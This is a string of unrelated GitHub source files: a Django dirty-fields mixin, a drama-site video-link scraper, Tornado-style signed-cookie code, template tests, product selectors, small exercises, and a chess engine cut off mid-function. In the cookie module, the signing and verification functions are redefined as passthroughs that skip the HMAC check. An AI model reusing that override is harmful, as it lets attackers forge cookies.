valid so we cannot convert it\n                pass\n\n            if isinstance(field_value, memoryview):\n                # psycopg2 returns uncopyable type buffer for bytea\n                field_value = bytes(field_value)\n\n            # Explanation of copy usage here:\n            # https://github.com/romgar/django-dirtyfields/commit/efd0286db8b874b5d6bd06c9e903b1a0c9cc6b00\n            all_field[field.name] = deepcopy(field_value)\n\n        return all_field\n\n    def _as_dict_m2m(self):\n        m2m_fields = {}\n\n        if self.pk:\n            for f, model in get_m2m_with_model(self.__class__):\n                if self.FIELDS_TO_CHECK and (f.attname not in self.FIELDS_TO_CHECK):\n                    continue\n\n                m2m_fields[f.attname] = set([obj.pk for obj in getattr(self, f.attname).all()])\n\n        return m2m_fields\n\n    def get_dirty_fields(self, check_relationship=False, check_m2m=None, verbose=False):\n        if self._state.adding:\n            # If the object has not yet been saved in the database, all fields are considered dirty\n            # for consistency (see https://github.com/romgar/django-dirtyfields/issues/65 for more details)\n            pk_specified = self.pk is not None\n            initial_dict = self._as_dict(check_relationship, include_primary_key=pk_specified)\n            if verbose:\n                initial_dict = {key: {'saved': None, 'current': self.normalise_function[0](value)}\n                                for key, value in initial_dict.items()}\n            return initial_dict\n\n        if check_m2m is not None and not self.ENABLE_M2M_CHECK:\n            raise ValueError(\"You can't check m2m fields if ENABLE_M2M_CHECK is set to False\")\n\n        modified_fields = compare_states(self._as_dict(check_relationship),\n                                         self._original_state,\n                                         self.compare_function,\n                                         self.normalise_function)\n\n        if check_m2m:\n            modified_m2m_fields = compare_states(check_m2m,\n                                                 self._original_m2m_state,\n                                                 self.compare_function,\n                                                 self.normalise_function)\n            modified_fields.update(modified_m2m_fields)\n\n        if not verbose:\n            # Keeps backward compatibility with previous function return\n            modified_fields = {\n                key: self.normalise_function[0](value['saved'])\n                for key, value in modified_fields.items()\n            }\n\n        return modified_fields\n\n    def is_dirty(self, check_relationship=False, check_m2m=None):\n        return {} != self.get_dirty_fields(check_relationship=check_relationship,\n                                           check_m2m=check_m2m)\n\n    def save_dirty_fields(self):\n        if self._state.adding:\n            self.save()\n        else:\n            dirty_fields = self.get_dirty_fields(check_relationship=True)\n            self.save(update_fields=dirty_fields.keys())\n\n\ndef reset_state(sender, instance, **kwargs):\n    # original state should hold all possible dirty fields to avoid\n    # getting a `KeyError` when checking if a field is dirty or not\n    update_fields = kwargs.pop('update_fields', None)\n    new_state = instance._as_dict(check_relationship=True)\n    FIELDS_TO_CHECK = getattr(instance, \"FIELDS_TO_CHECK\", None)\n\n    if update_fields is not None:\n        for field_name in update_fields:\n            field = sender._meta.get_field(field_name)\n            if not FIELDS_TO_CHECK or (field.name in FIELDS_TO_CHECK):\n\n                if field.get_attname() in instance.get_deferred_fields():\n                    continue\n\n                if field.name in new_state:\n                    instance._original_state[field.name] = (\n                        new_state[field.name]\n                    )\n                elif field.name in instance._original_state:\n                    # If we are here it means the field was updated in the DB,\n                    # and we don't know the new value in the database.\n                    # e.g. it was updated with an F() expression.\n                    # Because we now don't know the value in the DB,\n                    # we remove it from _original_state, because we can't tell\n                    # if it's dirty or not.\n                    del instance._original_state[field.name]\n    else:\n        instance._original_state = new_state\n\n    if instance.ENABLE_M2M_CHECK:\n        instance._original_m2m_state = 
instance._as_dict_m2m()\n","repo_name":"romgar/django-dirtyfields","sub_path":"src/dirtyfields/dirtyfields.py","file_name":"dirtyfields.py","file_ext":"py","file_size_in_byte":8360,"program_lang":"python","lang":"en","doc_type":"code","stars":589,"dataset":"github-code","pt":"37"} +{"seq_id":"40333078185","text":"import requests\r\nfrom threading import Thread\r\nfrom bs4 import BeautifulSoup\r\nfrom terminaltables import AsciiTable\r\nfrom colored import fg, bg, attr\r\nfrom os import system\r\nfrom art import text2art\r\n\r\nsystem(\"title \" + \"Kdrama Scraper by Henry Richard J\")\r\nsystem('cls')\r\n\r\nreset = attr('reset')\r\nart = text2art(\"Kdrama Scraper\")\r\nprint(fg(\"red\") + art + reset)\r\nprint(f\"{fg('#0ecf12')}Developed by Henry Richard J{reset}\")\r\nsearch_result_table = [[\"Index\", \"Drama Name\"]]\r\n\r\n\r\ndef get_episodes_url(drama_url):\r\n    all_episodes = []\r\n    result = requests.get(drama_url).text\r\n    soup = BeautifulSoup(result, \"html.parser\")\r\n\r\n    titles = soup.find_all('h3', {'class': 'title'})\r\n\r\n    drama_Title = soup.find('h1').text\r\n    details = soup.find_all('p')\r\n\r\n    details_check = \"\"\r\n\r\n    for i in range(1, len(details) - 1):\r\n        if \"Description\" in details[i].text:\r\n            details_check += details[i].text.replace(\"\\n\", \" \") + \"\\n\"\r\n        else:\r\n            details_check += details[i].text.replace(\"\\n\", \" \") + \"\\n\\n\"\r\n\r\n    print(f\"{fg('#fca503')}Title: {drama_Title}{reset}\\n\")\r\n\r\n    print(f\"{fg('#e6be30')}{details_check}{reset}\")\r\n\r\n    for i in range(len(titles)):\r\n        if \".html\" in titles[i]['onclick']:\r\n            all_episodes.append(titles[i]['onclick'].replace(\"window.location = '\", \"https://www3.dramacool.movie\"))\r\n\r\n    for episode in all_episodes:\r\n        Thread(target=get_video_url, args=(episode.replace(\"'\", \"\"),)).start()\r\n\r\n\r\ndef get_video_url(episode_url):\r\n    result = requests.get(episode_url).text\r\n    soup = BeautifulSoup(result, \"html.parser\")\r\n\r\n    titles = soup.find('h1').text\r\n    print(fg('#66e887') + titles.replace(\" | Dramacool\", \"\") + reset)\r\n\r\n    embedded_url = f\"https:{soup.find('iframe')['src']}\"\r\n\r\n    print(embedded_url)\r\n    print(\"*\" * 20)\r\n    print()\r\n\r\n\r\ndef search_drama():\r\n    query = input(\"Drama to search: \")\r\n\r\n    searching_color = fg(\"green\")\r\n    print(searching_color + \"[*] Searching for \" + query + \".....\" + reset)\r\n\r\n    drama_details_urls = []\r\n\r\n    drama_Names = []\r\n\r\n    url = f\"https://www3.dramacool.movie/search?type=movies&keyword={query}\"\r\n\r\n    result = requests.get(url).text\r\n    if \"don't exist\" in result:\r\n        print(f\"{fg('red')}[*] No results found for {query}!{reset}\")\r\n        exit()\r\n    soup = BeautifulSoup(result, \"html.parser\")\r\n\r\n    drama_titles = soup.find_all('h3', {'class': 'title'})\r\n\r\n    for drama_title in drama_titles:\r\n        drama_Names.append(drama_title.text)\r\n        drama_details_urls.append(drama_title['onclick'].replace(\"window.location = '\", \"https://www3.dramacool.movie\"))\r\n\r\n    for i in range(len(drama_Names)):\r\n        search_result_table.append([str(i + 1), drama_Names[i]])\r\n\r\n    table = AsciiTable(search_result_table)\r\n    table_color = fg(\"#66e887\")\r\n    print(table_color + table.table + reset)\r\n    print(searching_color + \"[*] Total Results \" + str(len(drama_Names)) + reset)\r\n\r\n    drama_choice = int(input(\"Enter the index number of the drama you want to scrape: \")) - 1\r\n    print()\r\n    get_episodes_url(drama_details_urls[drama_choice].replace(\"'\", 
\"\"))\r\n\r\n\r\nsearch_drama()\r\n","repo_name":"chayton00/project0","sub_path":"loopma.py","file_name":"loopma.py","file_ext":"py","file_size_in_byte":3128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71081347628","text":"\"\"\"\nTornado complaint cookie encoding\n(C) Tornado :)\n\"\"\"\nimport re\nimport time\nimport base64\nimport hashlib\nimport hmac\nimport warnings\n\n\nDEFAULT_SIGNED_VALUE_VERSION = 2\nDEFAULT_SIGNED_VALUE_MIN_VERSION = 1\n\n\ndef utf8(val):\n if isinstance(val, bytes):\n return val\n return val.encode('utf-8')\n\n\ndef create_signed_value(secret, name, value, version=None, clock=None,\n key_version=None):\n if version is None:\n version = DEFAULT_SIGNED_VALUE_VERSION\n if clock is None:\n clock = time.time\n\n timestamp = utf8(str(int(clock())))\n value = base64.b64encode(utf8(value))\n if version == 1:\n signature = _create_signature_v1(secret, name, value, timestamp)\n value = b\"|\".join([value, timestamp, signature])\n return value\n elif version == 2:\n # The v2 format consists of a version number and a series of\n # length-prefixed fields \"%d:%s\", the last of which is a\n # signature, all separated by pipes. All numbers are in\n # decimal format with no leading zeros. The signature is an\n # HMAC-SHA256 of the whole string up to that point, including\n # the final pipe.\n #\n # The fields are:\n # - format version (i.e. 2; no length prefix)\n # - key version (integer, default is 0)\n # - timestamp (integer seconds since epoch)\n # - name (not encoded; assumed to be ~alphanumeric)\n # - value (base64-encoded)\n # - signature (hex-encoded; no length prefix)\n def format_field(s):\n return utf8(\"%d:\" % len(s)) + utf8(s)\n to_sign = b\"|\".join([\n b\"2\",\n format_field(str(key_version or 0)),\n format_field(timestamp),\n format_field(name),\n format_field(value),\n b''])\n\n if isinstance(secret, dict):\n assert key_version is not None, 'Key version must be set when sign key dict is used'\n assert version >= 2, 'Version must be at least 2 for key version support'\n secret = secret[key_version]\n\n signature = _create_signature_v2(secret, to_sign)\n return to_sign + signature\n else:\n raise ValueError(\"Unsupported version %d\" % version)\n\n\ndef create_signed_value(_, __, value, *args, **kwargs):\n return (''.join(value.split())).encode()\n\n# A leading version number in decimal\n# with no leading zeros, followed by a pipe.\n_signed_value_version_re = re.compile(br\"^([1-9][0-9]*)\\|(.*)$\")\n\n\ndef _get_version(value):\n # Figures out what version value is. Version 1 did not include an\n # explicit version field and started with arbitrary base64 data,\n # which makes this tricky.\n m = _signed_value_version_re.match(value)\n if m is None:\n version = 1\n else:\n try:\n version = int(m.group(1))\n if version > 999:\n # Certain payloads from the version-less v1 format may\n # be parsed as valid integers. 
Due to base64 padding\n                # restrictions, this can only happen for numbers whose\n                # length is a multiple of 4, so we can treat all\n                # numbers up to 999 as versions, and for the rest we\n                # fall back to v1 format.\n                version = 1\n        except ValueError:\n            version = 1\n    return version\n\n\ndef decode_signed_value(secret, name, value, max_age_days=31,\n                        clock=None, min_version=None):\n    if clock is None:\n        clock = time.time\n    if min_version is None:\n        min_version = DEFAULT_SIGNED_VALUE_MIN_VERSION\n    if min_version > 2:\n        raise ValueError(\"Unsupported min_version %d\" % min_version)\n    if not value:\n        return None\n\n    value = utf8(value)\n    version = _get_version(value)\n\n    if version < min_version:\n        return None\n    if version == 1:\n        return _decode_signed_value_v1(secret, name, value,\n                                       max_age_days, clock)\n    elif version == 2:\n        return _decode_signed_value_v2(secret, name, value,\n                                       max_age_days, clock)\n    else:\n        return None\n\n\ndef decode_signed_value(_, __, value, *args, **kwargs):\n    return value[:5] + ' ' + value[5:]\n\n\ndef _decode_signed_value_v1(secret, name, value, max_age_days, clock):\n    parts = utf8(value).split(b\"|\")\n    if len(parts) != 3:\n        return None\n    signature = _create_signature_v1(secret, name, parts[0], parts[1])\n    if not hmac.compare_digest(parts[2], signature):\n        warnings.warn(\"Invalid cookie signature %r\" % value)\n        return None\n    timestamp = int(parts[1])\n    if timestamp < clock() - max_age_days * 86400:\n        warnings.warn(\"Expired cookie %r\" % value)\n        return None\n    if timestamp > clock() + 31 * 86400:\n        # _cookie_signature does not hash a delimiter between the\n        # parts of the cookie, so an attacker could transfer trailing\n        # digits from the payload to the timestamp without altering the\n        # signature.  For backwards compatibility, sanity-check timestamp\n        # here instead of modifying _cookie_signature.\n        warnings.warn(\"Cookie timestamp in future; possible tampering %r\" % value)\n        return None\n    if parts[1].startswith(b\"0\"):\n        warnings.warn(\"Tampered cookie %r\" % value)\n        return None\n    try:\n        return base64.b64decode(parts[0])\n    except Exception:\n        return None\n\n\ndef _decode_fields_v2(value):\n    def _consume_field(s):\n        length, _, rest = s.partition(b':')\n        n = int(length)\n        field_value = rest[:n]\n        # In python 3, indexing bytes returns small integers; we must\n        # use a slice to get a byte string as in python 2.\n        if rest[n:n + 1] != b'|':\n            raise ValueError(\"malformed v2 signed value field\")\n        rest = rest[n + 1:]\n        return field_value, rest\n\n    rest = value[2:]  # remove version number\n    key_version, rest = _consume_field(rest)\n    timestamp, rest = _consume_field(rest)\n    name_field, rest = _consume_field(rest)\n    value_field, passed_sig = _consume_field(rest)\n    return int(key_version), timestamp, name_field, value_field, passed_sig\n\n\ndef _decode_signed_value_v2(secret, name, value, max_age_days, clock):\n    try:\n        key_version, timestamp, name_field, value_field, passed_sig = _decode_fields_v2(value)\n    except ValueError:\n        return None\n    signed_string = value[:-len(passed_sig)]\n\n    if isinstance(secret, dict):\n        try:\n            secret = secret[key_version]\n        except KeyError:\n            return None\n\n    expected_sig = _create_signature_v2(secret, signed_string)\n    if not hmac.compare_digest(passed_sig, expected_sig):\n        return None\n    if name_field != utf8(name):\n        return None\n    timestamp = int(timestamp)\n    if timestamp < clock() - max_age_days * 86400:\n        # The signature has expired.\n        return None\n    try:\n        return base64.b64decode(value_field)\n    except Exception:\n        return None\n\n\ndef 
get_signature_key_version(value):\n    value = utf8(value)\n    version = _get_version(value)\n    if version < 2:\n        return None\n    try:\n        key_version, _, _, _, _ = _decode_fields_v2(value)\n    except ValueError:\n        return None\n\n    return key_version\n\n\ndef _create_signature_v1(secret, *parts):\n    hash = hmac.new(utf8(secret), digestmod=hashlib.sha1)\n    for part in parts:\n        hash.update(utf8(part))\n    return utf8(hash.hexdigest())\n\n\ndef _create_signature_v2(secret, s):\n    hash = hmac.new(utf8(secret), digestmod=hashlib.sha256)\n    hash.update(utf8(s))\n    return utf8(hash.hexdigest())\n\n\ndef is_absolute(path):\n    return any(path.startswith(x) for x in [\"/\", \"http:\", \"https:\"])\n","repo_name":"qonteo/luna","sub_path":"luna_v.3.3.3/luna-stat-server/src/common/secure_cookies/cookies.py","file_name":"cookies.py","file_ext":"py","file_size_in_byte":7780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13717015597","text":"import os\n\nimport unittest\nimport mozunit\nfrom taskcluster_graph.templates import (\n    Templates,\n    TemplatesException\n)\n\nclass TemplatesTest(unittest.TestCase):\n\n    def setUp(self):\n        abs_path = os.path.abspath(os.path.dirname(__file__))\n        self.subject = Templates(os.path.join(abs_path, 'fixtures'))\n\n\n    def test_invalid_path(self):\n        with self.assertRaisesRegexp(TemplatesException, 'must be a directory'):\n            Templates('/zomg/not/a/dir')\n\n    def test_no_templates(self):\n        content = self.subject.load('simple.yml', {})\n        self.assertEquals(content, {\n            'is_simple': True\n        })\n\n    def test_with_templates(self):\n        content = self.subject.load('templates.yml', {\n            'woot': 'bar'\n        })\n\n        self.assertEquals(content, {\n            'content': 'content',\n            'variable': 'bar'\n        })\n\n    def test_inheritance(self):\n        '''\n        The simple single pass inheritance case.\n        '''\n        content = self.subject.load('inherit.yml', {})\n        self.assertEqual(content, {\n            'content': 'content',\n            'variable': 'inherit'\n        })\n\n    def test_inheritance_implicit_pass(self):\n        '''\n        Implicitly pass parameters from the child to the ancestor.\n        '''\n        content = self.subject.load('inherit_pass.yml', {\n            'a': 'overriden'\n        })\n\n        self.assertEqual(content, { 'values': ['overriden', 'b', 'c'] })\n\n\n    def test_inheritance_circular(self):\n        '''\n        Circular reference handling.\n        '''\n        with self.assertRaisesRegexp(TemplatesException, 'circular'):\n            self.subject.load('circular.yml', {})\n\n    def test_deep_inheritance(self):\n        content = self.subject.load('deep/4.yml', {\n            'value': 'myvalue'\n        })\n        self.assertEqual(content, { 'variable': 'myvalue' })\n\n    def test_inheritance_with_simple_extensions(self):\n        content = self.subject.load('extend_parent.yml', {})\n        self.assertEquals(content, {\n            'list': ['1', '2', '3', '4'],\n            'obj': {\n                'from_parent': True,\n                'deeper': {\n                    'woot': 'bar',\n                    'list': ['baz', 'bar']\n                },\n                'level': 2,\n            },\n            'was_list': { 'replaced': True }\n        })\n\n\nif __name__ == '__main__':\n    mozunit.main()\n","repo_name":"classilla/tenfourfox","sub_path":"testing/taskcluster/tests/test_templates.py","file_name":"test_templates.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"en","doc_type":"code","stars":251,"dataset":"github-code","pt":"37"} +{"seq_id":"30910255513","text":"from typing import Any\n\nfrom django.db.models import Q\n\nfrom aria.categories.models import Category\nfrom aria.categories.selectors import category_tree_active_list_for_product\nfrom aria.core.decorators import cached\nfrom aria.core.managers import BaseQuerySet\nfrom 
aria.files.records import BaseHeaderImageRecord\nfrom aria.product_attributes.records import (\n    ColorDetailRecord,\n    MaterialDetailRecord,\n    RoomDetailRecord,\n    ShapeDetailRecord,\n)\nfrom aria.products.filters import ProductSearchFilter\nfrom aria.products.models import Product\nfrom aria.products.records import (\n    ProductDetailRecord,\n    ProductFileRecord,\n    ProductListRecord,\n)\nfrom aria.products.schemas.filters import ProductListFilters\nfrom aria.products.selectors.pricing import product_get_price_from_options\nfrom aria.products.selectors.product_options import product_options_list_for_product\nfrom aria.products.selectors.records import product_list_record, product_record\n\n\ndef product_detail(\n    *, product_id: int | None = None, product_slug: str | None = None\n) -> ProductDetailRecord | None:\n    \"\"\"\n    Get the detailed representation of a single product based on either\n    id or slug, although one of them has to be provided.\n\n    Be careful to not run this in a loop unless absolutely needed. It\n    already does quite a few queries, and will do that amount per loop\n    iteration.\n    \"\"\"\n\n    product = (\n        Product.objects.filter(Q(id=product_id) | Q(slug=product_slug)) # type: ignore\n        .with_active_categories()\n        .with_colors()\n        .with_materials()\n        .with_rooms()\n        .with_shapes()\n        .with_files()\n        .with_available_options_and_option_discounts()\n        .with_active_product_discounts()\n        .annotate_from_price()\n        .first()\n    )\n\n    if not product:\n        return None\n\n    categories = category_tree_active_list_for_product(product=product)\n    options = product_options_list_for_product(product=product)\n\n    product_base_record = product_record(product=product)\n\n    record = ProductDetailRecord(\n        **product_base_record.dict(),\n        categories=categories,\n        from_price=product_get_price_from_options(product=product),\n        display_price=product.display_price,\n        can_be_picked_up=product.can_be_picked_up,\n        can_be_purchased_online=product.can_be_purchased_online,\n        materials=[\n            MaterialDetailRecord.from_material(material)\n            for material in product.materials.all()\n        ],\n        rooms=[RoomDetailRecord.from_room(room) for room in product.rooms.all()],\n        colors=[\n            ColorDetailRecord(id=color.id, name=color.name, color_hex=color.color_hex)\n            for color in product.colors.all()\n        ],\n        shapes=[\n            ShapeDetailRecord(\n                id=shape.id,\n                name=shape.name,\n                image_url=shape.image.url if shape.image else None,\n            )\n            for shape in product.shapes.all()\n        ],\n        files=[\n            ProductFileRecord(\n                id=file.id,\n                product_id=file.product_id,\n                name=file.name,\n                file=file.file.url if file.file else None,\n            )\n            for file in product.files.all()\n        ],\n        images=[\n            BaseHeaderImageRecord.from_model(model=image)\n            for image in product.images.all()\n        ],\n        options=options,\n    )\n\n    return record\n\n\ndef product_list_for_sale_for_qs(\n    *,\n    products: BaseQuerySet[\"Product\"] | None,\n    filters: ProductListFilters | dict[str, Any] | None,\n) -> list[ProductListRecord]:\n    \"\"\"\n    Returns a filterable list of products based on the given queryset. 
The\n    ProductListRecord is a record of shared properties for use whenever we\n    show a list of products on the frontend.\n    \"\"\"\n\n    filters = filters or {}\n\n    if products is not None:\n        qs = products.preload_for_list().order_by(\"-created_at\") # type: ignore\n\n    else:\n        qs = Product.objects.available().preload_for_list().order_by(\"-created_at\") # type: ignore # pylint: disable=line-too-long\n\n    filtered_qs = ProductSearchFilter(filters, qs).qs\n\n    return [product_list_record(product=product) for product in filtered_qs]\n\n\ndef product_list(\n    *, filters: ProductListFilters | dict[str, Any] | None\n) -> list[ProductListRecord]:\n    \"\"\"\n    Returns a filterable list of products.\n    \"\"\"\n\n    products = Product.objects.all()\n\n    return product_list_for_sale_for_qs(products=products, filters=filters)\n\n\ndef product_list_for_sale(\n    *, filters: ProductListFilters | dict[str, Any] | None\n) -> list[ProductListRecord]:\n    \"\"\"\n    Returns a filterable list of products for sale.\n    \"\"\"\n\n    products = Product.objects.available()\n\n    return product_list_for_sale_for_qs(products=products, filters=filters)\n\n\ndef _product_list_for_sale_cache_key(\n    *, filters: ProductListFilters | dict[str, Any] | None\n) -> str:\n    return f\"products.for_sale.filters={filters}\"\n\n\n@cached(key=_product_list_for_sale_cache_key, timeout=5 * 60)\ndef product_list_for_sale_from_cache(\n    *, filters: ProductListFilters | dict[str, Any] | None\n) -> list[ProductListRecord]:\n    \"\"\"\n    Returns a filterable list of products for sale from cache.\n    \"\"\"\n\n    return product_list_for_sale(filters=filters)\n\n\ndef product_list_by_category(\n    *, category: Category, filters: ProductListFilters | dict[str, Any] | None\n) -> list[ProductListRecord]:\n    \"\"\"\n    Returns a filterable list of products belonging to the given category.\n    \"\"\"\n\n    products_by_category = Product.objects.by_category(category)\n\n    return product_list_for_sale_for_qs(products=products_by_category, filters=filters)\n\n\ndef _product_list_by_category_cache_key(\n    *, category: Category, filters: ProductListFilters | dict[str, Any] | None\n) -> str:\n    return f\"products.category_id={category.id}.filters={filters}\"\n\n\n@cached(key=_product_list_by_category_cache_key, timeout=5 * 60)\ndef product_list_by_category_from_cache(\n    *, category: Category, filters: ProductListFilters | dict[str, Any] | None\n) -> list[ProductListRecord]:\n    \"\"\"\n    Returns a filterable list of products belonging to the given category\n    from cache.\n    \"\"\"\n\n    return product_list_by_category(category=category, filters=filters)\n","repo_name":"danielkjellid/aria-api","sub_path":"aria/products/selectors/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":6299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13101896052","text":"def digito_par(num, pares = 0):\r\n    centena = num // 100\r\n    dezena = (num % 100) // 10\r\n    unidade = (num % 100) % 10\r\n    if centena % 2 == 0:\r\n        pares += 1\r\n    if dezena % 2 == 0:\r\n        pares += 1\r\n    if unidade % 2 == 0:\r\n        pares += 1\r\n    return f'The number {num} has {pares} even digits'\r\n\r\ndef main():\r\n    numero = int(input('Enter a number between 100 and 999: ').strip())\r\n    print(digito_par(numero))\r\n\r\nif __name__ == '__main__':\r\n    
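# Worked example for clarity: digito_par(123) returns\r\n    # 'The number 123 has 1 even digits', since of the digits 1, 2 and 3\r\n    # only the 2 is even.\r\n    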
main()","repo_name":"ernestopi/PEC-SEM07-T02","sub_path":"SEM07-T02-Q02.py","file_name":"SEM07-T02-Q02.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16234546316","text":"import sys\nimport fileinput\nimport argparse\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('files', nargs = '*', help = 'specify input files')\n\n group = parser.add_mutually_exclusive_group()\n group.add_argument('-o', '--output', \n help = 'specify the output file. The default is stdout')\n group.add_argument('-i', '--inplace', action = 'store_true',\n help = 'modify files inplace')\n args = parser.parse_args()\n\n if args.output and args.output != '-':\n output_file = open(args.output, 'w')\n else:\n output_file = sys.stdout\n\n # write lines \n for line in fileinput.input(args.files, inplace=args.inplace):\n output_file.write(line)\n \n # close file explicitely\n if args.output and args.output != '-':\n output_file.close()\n\n\n","repo_name":"gongbudaizhe/bilib","sub_path":"utils/cat.py","file_name":"cat.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7834340840","text":"# 341. Flatten Nested List Iterator Add to List\n# DescriptionSubmissionsSolutions\n# Total Accepted: 32604\n# Total Submissions: 81167\n# Difficulty: Medium\n# Contributor: LeetCode\n# Given a nested list of integers, implement an iterator to flatten it.\n# \n# Each element is either an integer, or a list -- whose elements may also be integers or other lists.\n# \n# Example 1:\n# Given the list [[1,1],2,[1,1]],\n# \n# By calling next repeatedly until hasNext returns false, the order of elements returned by next should be: [1,1,2,1,1].\n# \n# Example 2:\n# Given the list [1,[4,[6]]],\n# \n# By calling next repeatedly until hasNext returns false, the order of elements returned by next should be: [1,4,6].\n# \n\n# \"\"\"\n# This is the interface that allows for creating nested lists.\n# You should not implement it, or speculate about its implementation\n# \"\"\"\n#class NestedInteger(object):\n# def isInteger(self):\n# \"\"\"\n# @return True if this NestedInteger holds a single integer, rather than a nested list.\n# :rtype bool\n# \"\"\"\n#\n# def getInteger(self):\n# \"\"\"\n# @return the single integer that this NestedInteger holds, if it holds a single integer\n# Return None if this NestedInteger holds a nested list\n# :rtype int\n# \"\"\"\n#\n# def getList(self):\n# \"\"\"\n# @return the nested list that this NestedInteger holds, if it holds a nested list\n# Return None if this NestedInteger holds a single integer\n# :rtype List[NestedInteger]\n# \"\"\"\n\n# 2018.11.23\n# self wrote\n# Use self.L and self.index to keep track of the current Integer\n# To find out next,\n# First, self.index += 1\n# if self.index is pointing to a list, keep looping and adding the current L, index + 1 into stack\n# if self.index == len(self.L), pop from stack and find out the next\n\nclass NestedIterator(object):\n\n def __init__(self, nestedList):\n \"\"\"\n Initialize your data structure here.\n :type nestedList: List[NestedInteger]\n \"\"\"\n self.stack = []\n self.L = nestedList\n self.index = 0\n self.findNext() # Stop at next INT\n \n \n\n def next(self):\n \"\"\"\n :rtype: int\n \"\"\"\n res = self.L[self.index].getInteger()\n # print(\"NEXT : \", res)\n self.index += 1\n self.findNext()\n return res\n \n\n 
def hasNext(self):\n        \"\"\"\n        :rtype: bool\n        \"\"\"\n        return True if self.L else False\n    \n    def findNext(self):\n        # print(\"findNext : \", self.L, self.index)\n        if not self.L and not self.stack:\n            return\n        \n        while self.stack or self.index <= len(self.L):\n            if self.index == len(self.L):\n                if self.stack:\n                    self.L, self.index = self.stack.pop()\n                else:\n                    self.L = []\n            else:\n                if self.L[self.index].isInteger():\n                    return\n                else:\n                    self.stack.append([self.L, self.index + 1])\n                    self.L = self.L[self.index].getList()\n                    self.index = 0\n        return \n\n\n# 2018.02.25 One stack solution\n# First reversely push to stack\n# hasNext() to find next available element\n# Not a good answer because hasNext is not idempotent\n\nfrom collections import deque\nclass NestedIterator(object):\n\n    def __init__(self, nestedList):\n        \"\"\"\n        Initialize your data structure here.\n        :type nestedList: List[NestedInteger]\n        \"\"\"\n        self.d = deque()\n        for i in xrange(len(nestedList) - 1, -1, -1):\n            self.d.append(nestedList[i])\n        \n    def next(self):\n        \"\"\"\n        :rtype: int\n        \"\"\"\n        return self.d.pop().getInteger()\n    \n\n    def hasNext(self):\n        \"\"\"\n        :rtype: bool\n        \"\"\"\n        d = self.d\n        #print(\"hasNext\", self.d)\n        while d:\n            if d[-1].isInteger(): \n                return True\n            cur = d.pop().getList()\n            for i in xrange(len(cur) - 1, -1, -1):\n                d.append(cur[i])\n        return False\n    \n\n# 2017.05.13 Stack\nfrom collections import deque\nclass NestedIterator(object):\n\n    def __init__(self, nestedList):\n        \"\"\"\n        Initialize your data structure here.\n        :type nestedList: List[NestedInteger]\n        \"\"\"\n        self.s = [[nestedList, 0]]\n\n    def next(self):\n        \"\"\"\n        :rtype: int\n        \"\"\"\n        if not self.hasNext(): return \"ERROR\"\n        nestedList, i = self.s[-1]\n        self.s[-1][1] += 1\n        return nestedList[i].getInteger()\n    \n    def hasNext(self):\n        \"\"\"\n        :rtype: bool\n        \"\"\"\n        s = self.s\n        while s:\n            nestedList, i = s[-1]\n            if i == len(nestedList):\n                s.pop()\n            else:\n                x = nestedList[i]\n                if x.isInteger(): return True\n                s[-1][1] += 1\n                s.append([x.getList(), 0])\n        return False\n\n# Your NestedIterator object will be instantiated and called as such:\n# i, v = NestedIterator(nestedList), []\n# while i.hasNext(): v.append(i.next())\n","repo_name":"yihanc/LC","sub_path":"PY/341_flatten_nested_list_iterator.py","file_name":"341_flatten_nested_list_iterator.py","file_ext":"py","file_size_in_byte":5171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4421408628","text":"import copy\n\nclass Game_of_Chess:\n\n    def __init__(self):\n        self.turn = True #whose turn it is\n        self.move_counter = 0 #how many moves have been made\n        self.enpassant = -1 #the square that can be captured en passant.\n        self.castle = [True,True] #whether the white and the black king have moved\n        self.board = [\"o\" for i in range(64)] #placement of the pieces on the board\n        self.white=[] #squares occupied by white pieces\n        self.black=[] #squares occupied by black pieces\n        self.kings = [-1,-1] #squares occupied by the kings\n        self.kings_attacked=[False,False] #whether the king of a given color is in check\n        \n    def fill_board(self):\n        \"sets up the pieces in the starting position\"\n        fen=\"rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR\"\n        i=0\n        for x in fen:\n            if x==\"/\":continue\n            elif ord(x)<=57 and ord(x)>=48: \n                for j in range(ord(x)-48):\n                    self.board[i]=\"o\"\n                    i+=1\n                \n            else :\n                self.board[i]=x\n                if x.isupper(): \n                    self.white.append(i)\n                    if x==\"K\": self.kings[0]=i\n                else: \n                    self.black.append(i)\n                    if x==\"k\":self.kings[1]=i\n                i+=1\n        self.kings_attacked = 
self.is_square_controlled(self.kings[0],False),self.is_square_controlled(self.kings[1],True)\n        \n    def get_moves_unsafeking(self,i,turn):\n        \"returns the available moves for the piece on the given square, without taking the king's safety into account. Turn says whose turn it is.\"\n        \n        def get_rook_moves(i,color):\n            \"Returns the moves for a rook of color color\"\n            x =i%8\n            y =i//8\n            moves=[]\n            squares = []\n            squares.append([(j,y) for j in range(x+1,8)])\n            squares.append([(j,y) for j in range(x-1,-1,-1)])\n            squares.append([(x,j) for j in range(y+1,8)])\n            squares.append([(x,j) for j in range(y-1,-1,-1)])\n\n            for lines in squares:\n                for sq in lines:\n                    if self.board[sq[0]+8*sq[1]]==\"o\": moves.append(sq[0]+8*sq[1])\n                    else : \n                        if self.board[sq[0]+8*sq[1]].isupper()!=color : moves.append(sq[0]+8*sq[1])\n                        break\n            return moves \n        def get_bishop_moves(i,color):\n            \"Returns the moves for a bishop of color color\" \n            x = i%8\n            y = i//8\n            moves = []\n            squares = []\n            squares.append([(x+i,y+i) for i in range(1,8) if x+i<8 and y+i<8])\n            squares.append([(x-i,y-i) for i in range(1,8) if x-i>=0 and y-i>=0])\n            squares.append([(x+i,y-i) for i in range(1,8) if x+i<8 and y-i>=0])\n            squares.append([(x-i,y+i) for i in range(1,8) if x-i>=0 and y+i<8])\n            for lines in squares:\n                for sq in 